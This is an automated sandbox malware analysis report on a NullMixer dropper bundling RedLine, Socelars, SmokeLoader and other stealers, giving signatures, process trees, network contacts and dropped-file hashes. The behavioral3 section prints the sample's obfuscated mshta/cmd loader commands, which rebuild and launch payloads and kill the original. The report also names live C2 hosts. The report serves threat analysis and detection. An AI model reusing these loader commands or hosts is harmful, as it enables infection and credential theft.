Malware Analysis Report

2024-11-15 09:04

Sample ID 241111-lfg3vswpdx
Target 6851b72e0bfaf608294bcac6ffef07e5e6591aee8b94ce9afad46b6e6cc32a59
SHA256 6851b72e0bfaf608294bcac6ffef07e5e6591aee8b94ce9afad46b6e6cc32a59
Tags
discovery socelars spyware stealer gcleaner loader onlylogger redline chris infostealer media26 smokeloader pub5 backdoor trojan aspackv2 privateloader fabookie nullmixer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral31

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral32

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

6851b72e0bfaf608294bcac6ffef07e5e6591aee8b94ce9afad46b6e6cc32a59

Threat Level: Known bad

The file 6851b72e0bfaf608294bcac6ffef07e5e6591aee8b94ce9afad46b6e6cc32a59 was found to be: Known bad.

Malicious Activity Summary

discovery socelars spyware stealer gcleaner loader onlylogger redline chris infostealer media26 smokeloader pub5 backdoor trojan aspackv2 privateloader fabookie nullmixer

OnlyLogger

Nullmixer family

Socelars payload

Detect Fabookie payload

Redline family

Onlylogger family

GCleaner

Fabookie family

Socelars

RedLine payload

Socelars family

Smokeloader family

Privateloader family

RedLine

SmokeLoader

Gcleaner family

OnlyLogger payload

Loads dropped DLL

ASPack v2.12-2.42

Executes dropped EXE

Deletes itself

Reads user/profile data of web browsers

Checks computer location settings

Looks up external IP address via web service

Checks installed software on the system

Looks up geolocation information via web service

Legitimate hosting services abused for malware hosting/C2

Blocklisted process makes network request

Drops Chrome extension

Suspicious use of SetThreadContext

AutoIT Executable

Program crash

Unsigned PE

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Browser Information Discovery

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Kills process with taskkill

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Checks SCSI registry key(s)

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of FindShellTrayWindow

Suspicious behavior: GetForegroundWindowSpam

Modifies Internet Explorer settings

Suspicious use of SendNotifyMessage

Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-11 09:28

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie family

fabookie

Nullmixer family

nullmixer

Privateloader family

privateloader

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-11-11 09:28

Reported

2024-11-11 09:31

Platform

win10v2004-20241007-en

Max time kernel

91s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09977fdc12334.exe"

Signatures

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09977fdc12334.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09977fdc12334.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09977fdc12334.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
NL 45.133.1.107:80 tcp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 172.67.133.215:80 wfsdragon.ru tcp
FR 51.178.186.149:80 tcp
US 8.8.8.8:53 215.133.67.172.in-addr.arpa udp
US 8.8.8.8:53 235.3.20.104.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp

Files

N/A

Analysis: behavioral27

Detonation Overview

Submitted

2024-11-11 09:28

Reported

2024-11-11 09:30

Platform

win7-20240708-en

Max time kernel

121s

Max time network

123s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09e95ff6b5.exe"

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09e95ff6b5.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09e95ff6b5.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09e95ff6b5.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 panelbot.webtm.ru udp
RU 92.53.96.150:80 panelbot.webtm.ru tcp
US 8.8.8.8:53 vh300.timeweb.ru udp
RU 92.53.96.150:443 vh300.timeweb.ru tcp

Files

C:\Users\Admin\AppData\Local\Temp\Cab5302.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\Local\Temp\Tar5315.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-11 09:28

Reported

2024-11-11 09:31

Platform

win7-20241010-en

Max time kernel

39s

Max time network

19s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\SysWOW64\mshta.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2220 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe C:\Windows\SysWOW64\mshta.exe
PID 2220 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe C:\Windows\SysWOW64\mshta.exe
PID 2220 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe C:\Windows\SysWOW64\mshta.exe
PID 2220 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe C:\Windows\SysWOW64\mshta.exe
PID 2220 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe C:\Windows\SysWOW64\mshta.exe
PID 2220 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe C:\Windows\SysWOW64\mshta.exe
PID 2220 wrote to memory of 2236 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe C:\Windows\SysWOW64\mshta.exe
PID 2236 wrote to memory of 2996 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2236 wrote to memory of 2996 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2236 wrote to memory of 2996 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2236 wrote to memory of 2996 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2236 wrote to memory of 2996 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2236 wrote to memory of 2996 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2236 wrote to memory of 2996 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2996 wrote to memory of 2116 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE
PID 2996 wrote to memory of 2116 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE
PID 2996 wrote to memory of 2116 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE
PID 2996 wrote to memory of 2116 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE
PID 2996 wrote to memory of 2116 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE
PID 2996 wrote to memory of 2116 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE
PID 2996 wrote to memory of 2116 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE
PID 2996 wrote to memory of 2484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2996 wrote to memory of 2484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2996 wrote to memory of 2484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2996 wrote to memory of 2484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2996 wrote to memory of 2484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2996 wrote to memory of 2484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2996 wrote to memory of 2484 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2116 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE C:\Windows\SysWOW64\mshta.exe
PID 2116 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE C:\Windows\SysWOW64\mshta.exe
PID 2116 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE C:\Windows\SysWOW64\mshta.exe
PID 2116 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE C:\Windows\SysWOW64\mshta.exe
PID 2116 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE C:\Windows\SysWOW64\mshta.exe
PID 2116 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE C:\Windows\SysWOW64\mshta.exe
PID 2116 wrote to memory of 2284 N/A C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE C:\Windows\SysWOW64\mshta.exe
PID 2284 wrote to memory of 2716 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2284 wrote to memory of 2716 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2284 wrote to memory of 2716 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2284 wrote to memory of 2716 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2284 wrote to memory of 2716 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2284 wrote to memory of 2716 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2284 wrote to memory of 2716 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2116 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE C:\Windows\SysWOW64\mshta.exe
PID 2116 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE C:\Windows\SysWOW64\mshta.exe
PID 2116 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE C:\Windows\SysWOW64\mshta.exe
PID 2116 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE C:\Windows\SysWOW64\mshta.exe
PID 2116 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE C:\Windows\SysWOW64\mshta.exe
PID 2116 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE C:\Windows\SysWOW64\mshta.exe
PID 2116 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE C:\Windows\SysWOW64\mshta.exe
PID 1748 wrote to memory of 2532 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 1748 wrote to memory of 2532 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 1748 wrote to memory of 2532 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 1748 wrote to memory of 2532 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 1748 wrote to memory of 2532 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 1748 wrote to memory of 2532 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 1748 wrote to memory of 2532 N/A C:\Windows\SysWOW64\mshta.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 2924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 2924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 2924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 2924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 2924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 2924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 2924 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2532 wrote to memory of 2964 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbScript: cLOSE ( CREatEObJEcT ( "WSCRIpt.ShELL" ). Run( "CMD /R tyPE ""C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe"" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF """" == """" for %L IN (""C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe"" ) do taskkill -f -im ""%~nxL"" " ,0 , trUe) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /R tyPE "C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF "" == "" for %L IN ("C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed094c47c32b.exe" ) do taskkill -f -im "%~nxL"

C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE

XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF

C:\Windows\SysWOW64\taskkill.exe

taskkill -f -im "Wed094c47c32b.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbScript: cLOSE ( CREatEObJEcT ( "WSCRIpt.ShELL" ). Run( "CMD /R tyPE ""C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE"" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF ""/Pgxf5hQhM5tF "" == """" for %L IN (""C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE"" ) do taskkill -f -im ""%~nxL"" " ,0 , trUe) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /R tyPE "C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE" > XYB0bVL96aEKhA.exE&& stArt XYB0BvL96AEKHA.eXE /Pgxf5hQhM5tF & IF "/Pgxf5hQhM5tF " == "" for %L IN ("C:\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE" ) do taskkill -f -im "%~nxL"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vbsCriPt: closE ( CrEaTeoBJecT ( "WsCRiPT.ShEll" ). RuN ( "cmd /R EcHO | SEt /p = ""MZ"" > OsuKT1.9t & cOPY /B /y OsuKT1.9t + XRB2l6FD.IlF +9Odf.6 PEQqN6S.Ou & STart msiexec.exe -y .\PEQQN6S.OU & DEl XRB2L6FD.iLF 9Odf.6 OsuKT1.9t ", 0 , True ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /R EcHO | SEt /p = "MZ" > OsuKT1.9t & cOPY /B /y OsuKT1.9t + XRB2l6FD.IlF+9Odf.6 PEQqN6S.Ou & STart msiexec.exe -y .\PEQQN6S.OU & DEl XRB2L6FD.iLF 9Odf.6 OsuKT1.9t

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" EcHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" SEt /p = "MZ" 1>OsuKT1.9t"

C:\Windows\SysWOW64\msiexec.exe

msiexec.exe -y .\PEQQN6S.OU

Network

N/A

Files

\Users\Admin\AppData\Local\Temp\XYB0bVL96aEKhA.exE

MD5 b5cfd3a9dc9e645e24c79991bca60460
SHA1 0d6bcdca2121d279bbe87c66cab515ac2478f555
SHA256 852bffb94dbd3ed18ac11311b701ee80400209a19b3660b544146b41fa3b9768
SHA512 55861773c758e5f3cc7440d012d820892f7b9155b542baeab940a8c80fd50ffd1001fca6f9f9dae7eca3ae53919eba795aca53d5bb3aaaf29a111acd016d24e6

C:\Users\Admin\AppData\Local\Temp\OsuKT1.9t

MD5 ac6ad5d9b99757c3a878f2d275ace198
SHA1 439baa1b33514fb81632aaf44d16a9378c5664fc
SHA256 9b8db510ef42b8ed54a3712636fda55a4f8cfcd5493e20b74ab00cd4f3979f2d
SHA512 bfcdcb26b6f0c288838da7b0d338c2af63798a2ece9dcd6bc07b7cadf44477e3d5cfbba5b72446c61a1ecf74a0bccc62894ea87a40730cd1d4c2a3e15a7bb55b

C:\Users\Admin\AppData\Local\Temp\xrB2l6FD.ilF

MD5 cd4352def1a81b4fe232eeb2c77dbc57
SHA1 9fb4f9a790efe3676915699bdc89ba0a06ce8210
SHA256 93589b9795d7547015734043f51c8d9a561857452eb91a52609a0be35bc3701c
SHA512 1b59d106cc324ad4c6f99358f6d9a6ec9c671ec8573c1f3084bf3d7f3c8f410691c9324b986d51cd89d5b0c48be95298a13a012ecbcfa379af906db25066656e

C:\Users\Admin\AppData\Local\Temp\9Odf.6

MD5 b259839b9455f04e8299f22cebe3274f
SHA1 30bbbc8d5089648c8c5425c23874976ba2e07b34
SHA256 edf7907b29f08e5788b6c611660348cce7cfaacb16bc484471aa06a1b9f8af89
SHA512 3de7e0e2d59a9bda837ca9bc5f0da15106ed045aaf28b0ad9ff6afb2a901f23747ace1373d9538692847f51cfbb22fa608e526cacce737c7e70b7482a643bb0d

C:\Users\Admin\AppData\Local\Temp\PEQQN6S.OU

MD5 a2feb31d070b6920981b5461baa1ef81
SHA1 8b67bdb5e4a9e773c0ffade6545a3f292b2e7fd7
SHA256 ac7f2aaad9b9548136d48eb1e769d4339e958fb56fda2151f8637add5a77c950
SHA512 b82a3d898d1f328353c1911eff024f5b523f1d4fdf4dbdc914b2775d16590cce9c027e34b9c3f9681e9e09436dc345b4cff878b953c8525891736aeea1e14694

memory/3060-17-0x0000000002160000-0x00000000022F8000-memory.dmp

memory/3060-18-0x0000000002160000-0x00000000022F8000-memory.dmp

memory/3060-21-0x00000000026E0000-0x000000000278F000-memory.dmp

memory/3060-22-0x0000000002790000-0x000000000282A000-memory.dmp

memory/3060-25-0x0000000002790000-0x000000000282A000-memory.dmp

memory/3060-26-0x0000000002790000-0x000000000282A000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-11-11 09:28

Reported

2024-11-11 09:31

Platform

win7-20241010-en

Max time kernel

150s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09abf83d9c2.exe"

Signatures

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09abf83d9c2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09abf83d9c2.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09abf83d9c2.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09abf83d9c2.exe"

C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09abf83d9c2.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09abf83d9c2.exe" -u

Network

Country Destination Domain Proto
US 8.8.8.8:53 t.gogamec.com udp

Files

N/A

Analysis: behavioral25

Detonation Overview

Submitted

2024-11-11 09:28

Reported

2024-11-11 09:30

Platform

win7-20240903-en

Max time kernel

117s

Max time network

118s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe"

Signatures

Socelars

stealer socelars

Socelars family

socelars

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up geolocation information via web service

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer\Wed09db0d52c38.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

